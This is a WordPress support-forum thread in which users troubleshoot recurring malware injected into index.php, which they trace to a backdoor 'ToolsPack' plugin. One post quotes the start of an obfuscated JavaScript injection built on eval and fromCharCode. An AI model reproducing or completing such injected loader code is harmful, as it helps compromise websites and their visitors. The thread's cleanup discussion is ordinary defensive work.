WordPress.org

Ready to get started?Download WordPress

Forums

Malware issue (37 posts)

  1. sharonbarnes
    Member
    Posted 2 years ago #

    Hello,
    I have multiple wordpress sites hosted on one server. Google keeps listing a few of my sites as malware, but when I go and look at the suspected code, it looks like it might be meant to be there. It's on the index.php file of all my sites. The code is below. Could sometime tell me if this code is good or bad or if I should get rid of it? I don't understand why Google is saying only one of my sites has malware when they all have this code in the index.php file.

    [removed]

    Thanks!!!

  2. sharonbarnes
    Member
    Posted 2 years ago #

    Also, getting this error when attempting to access the blog:
    Parse error: syntax error, unexpected '<' in /home/content/s/h/a/sharonbarnes/html/cambodianow/wp-content/themes/twentyeleven/index.php on line 14
    Is this a result of hacking? Can someone help me on how to fix this and if I need to change hosting providers?

    Thanks!

  3. adebaby
    Member
    Posted 2 years ago #

    Same here

    <script>if(window.document)try{location(12);}catch(qqq){zz='eval';aa=[]+0;aaa=0+[];if(aa.indexOf(aaa)===0){ss='';s=String;f='fro'+'m'+'C'+'h'+'ar';f+='Code';}ee='e';e=window[zz];t='y';}h=-2*Math.log and then a load of numbers

    i have 2 domains with wordpress hacked on a shared hosting account but 2 other domains with wordpress were unaffected. The affected domains were thankfully much lower use than the others

    Just replace the index.php with a new copy. all is well after but hard to know if any other files are infected

    Only thing that i noticed was that the two affected domains had the twitter for wordpress plugin and the others don't. could be coincedence

  4. rana124
    Member
    Posted 2 years ago #

    reinstall all your wordpress and backup your database.
    that is the safest way

  5. adebaby
    Member
    Posted 2 years ago #

    the index.php malware script returned within an hour or two. cant see anything suspicious in the logs, ftp password had been changed. have replaced all the core files except the content and see if it comes back again

  6. adebaby
    Member
    Posted 2 years ago #

    There is a post from yesterday about the script which generates the hack

    pastebin.com/pGmDGqzz

    a few other posts there also have the same js hack

  7. sharonbarnes
    Member
    Posted 2 years ago #

    I've change absolutely all my passwords, deleted the code and it keeps coming back! Help!! I have 5 sites and it would take forever to re-install wordpress on all of them and I'd lose so much data. I don't have a fresh back up available.

  8. adebaby
    Member
    Posted 2 years ago #

    who is your hosting company? Is it a shared host?

  9. sharonbarnes
    Member
    Posted 2 years ago #

    It's hosted with GoDaddy.

  10. zanzaboonda
    Member
    Posted 2 years ago #

    I read somewhere that the codes are uploaded via "back doors" that are planted in upload, theme, or plugin folders. It's almost impossible (IMHO based on hours and hours wasted) to find them.

    I think I was initially hacked via the timthumb vulnerability. There is a plugin to detect and fix that, if necessary. There are plugins that will also scan your site for vulnerabilities. You *might* be able to find the hacks, but I was never successful.

    I wound up gutting everything and reinstalling from scratch. I'm still having problems... :(

  11. sharonbarnes
    Member
    Posted 2 years ago #

    That's brutal. So even gutting it all didn't fix it for you? Did you change hosting providers?

  12. zanzaboonda
    Member
    Posted 2 years ago #

    I haven't changed hosting providers yet. I have GoDaddy. I put out a call for help, and I want to wait and see what the experts say first.

    http://wordpress.org/support/topic/malware-redirect-hacks-specific-question-regarding-vulnerabilities?replies=1

    I've tried AntiVirus (which found the latest problem before I did), Hide Login, and Secure WordPress. Those three are on my blog that supposedly hasn't been hacked yet, so I'm pretty sure they're safe. But I don't trust anything anymore! lol

    You might want to check out some of these plugin recommendations. I don't know how effective they all are and not all of them are tested with 3.3.1. But they're worth looking into.

    http://allbloggingtips.com/2012/02/03/top-20-best-wordpress-security-plugins/

    They *might* help you figure out where the problem is coming from, depending on your issue.

    One of them had detected a problem with my index.php in Twenty Eleven as well, along with a bunch of other things. But I don't think it's related to the theme itself.

    If you get redirect malware, try this. It checks the files in your theme.

    http://wordpress.org/extend/plugins/timthumb-vulnerability-scanner/

    I think there was another good plugin, but I can't remember it atm...

    I would also delete any themes and plugins you aren't using. Don't just deactivate them, but delete them.

    Try also checking your site via Sucuri. It will tell you the pages that are producing problems (but that doesn't mean that's where the problems are).

    http://sitecheck.sucuri.net/scanner/

    It might help, though, if you can figure out a common thread. I think many of them have to do with Javascript code? I honestly don't know.

    This whole thing has been a huge wake-up call for me. I just wish I could fix it. lol

  13. adebaby
    Member
    Posted 2 years ago #

    I seem to have found my problem and i wouldn't be surpised if sharon has same problem

    I had two sites in a hosting plan infected. one site was a dormant wordpress site locked with absolute security plugin which is apparently not secure now

    http://blog.sucuri.net/2012/02/vulnerability-in-the-absolute-privacy-plugin.html

    I then looked on the server logs for this site a saw that a russian server 83.69.224.224 was calling /wp-content/plugins/ToolsPack/ToolsPack.php every hour. I deleted all the files on this site a few hours ago and i can see that toolspack was being hit until i deleted it and now it is a 404 and since then my server is so far ok. The same blog also has an article on this toolspack

    http://blog.sucuri.net/2012/02/new-wordpress-toolspack-plugin.html

    I don't recall using this toolspack plugin but somehow it got installed, probably through the absolute privacy plugin

    Check all your plugin folders for this plugin

    Edit: Absolute privacy has been fixed now but the plugin had not been updated on my server
    http://wordpress.org/support/topic/absolute-privacy-badly-broken?replies=12

  14. zanzaboonda
    Member
    Posted 2 years ago #

    Good tip. I don't remember seeing that one myself, but I'll keep an eye out for it.

    Hope it helps her. Thanks for the heads up.

  15. ClaytonJames
    Member
    Posted 2 years ago #

    Some of the code in this post contains a link/is triggering a warning for a blackhole exploit kit.

  16. kmessinger
    Volunteer Moderator
    Posted 2 years ago #

  17. zanzaboonda
    Member
    Posted 2 years ago #

    @Clayton.James Can you explain your comment? I'm not sure I understand what you meant/

    @kmessigner I've seen some of those articles but not all. Thanks for posting. IYO, what's the best way to "harden" WP? I got hacked on a fresh install that was less than 12 hours old and had security plugins installed.

    I'm beginning to think it's a problem with GoDaddy... Any secure (and inexpensive) hosting recommendations?

  18. sharonbarnes
    Member
    Posted 2 years ago #

    adebaby: That sounds promising. Stupid question: how do I access my server logs? I've been looking all over the place and can't figure it out.

    Thanks

  19. adebaby
    Member
    Posted 2 years ago #

    It will be in your admin pages somewhere. but i would get an ftp program and look in all your wordpress plugins for toolpack and check existing plugins are up to date and secure. remove any old plugins u dont need

  20. kmessinger
    Volunteer Moderator
    Posted 2 years ago #

    I followed everything here, http://codex.wordpress.org/Hardening_WordPress.

    I have Web Defender monitor the site. They do one for free.

    Still, at the big security conference here in SF last week, the consensus was the hackers are winning.

  21. adebaby
    Member
    Posted 2 years ago #

    someone wrote that russian servers should be banned from the internet due to all the trouble they cause. can agree now

  22. sharonbarnes
    Member
    Posted 2 years ago #

    @adebaby I FOUND that Toolsbox plugin! It was from the same IP that you had. Now in the process of clean everything out and changing passwords. Thanks!

  23. ClaytonJames
    Member
    Posted 2 years ago #

    @zanzaboonda

    The code example posted by sharonbarnes is triggering a malware warning when trying to access this conversation. Users of a windows operating system and AVG antivirus, will probably experience AVG as identifing the code (correctly, or incorrectly) as an active exploit "in this thread", and will aggressivly deny any access to it. Leaving the user with the impression that there is a virus on the page you are now currently reading. :-)

    I tagged the thread with a "modlook", and my comment was just a short note to any mod that saw it, so that they could do whatever they needed to prevent the virus warning. Sorry for any confusion!

  24. kmessinger
    Volunteer Moderator
    Posted 2 years ago #

    That is why I encourage folks not to post malware code or even parts of it.

  25. sharonbarnes
    Member
    Posted 2 years ago #

    @ClaytonJames @kmessinger Sorry...I didn't realize that would happen. I've never been hacked before :(

  26. kmessinger
    Volunteer Moderator
    Posted 2 years ago #

    No worries. When folks get hacked they go into panic mode.

  27. zanzaboonda
    Member
    Posted 2 years ago #

    @ClaytonJames Ah, I gotcha. Thanks for the explanation.

    @kmessinger Thanks so much for all of your help. :)

  28. ClaytonJames
    Member
    Posted 2 years ago #

    I didn't realize that would happen. I've never been hacked before :(

    Don't worry sharon, It gets easier the second time...

    I'm kidding, really, just KIDDING I say!!! I'm so, so, sorry. I just couldn't help myself!

    (Holy cow, what the heck is wrong with me?) I'm very sorry. ...twisted sense of humor.

    LMAO :-)

  29. sharonbarnes
    Member
    Posted 2 years ago #

    I will be buffing up my security big time and doing back ups all the time thats for sure! thanks for help :)

  30. adebaby
    Member
    Posted 2 years ago #

    Im thinking of splitting my hosting. multi domain hosting on one account is convenient but not as secure

Topic Closed

This topic has been closed to new replies.

About this Topic

Tags

No tags yet.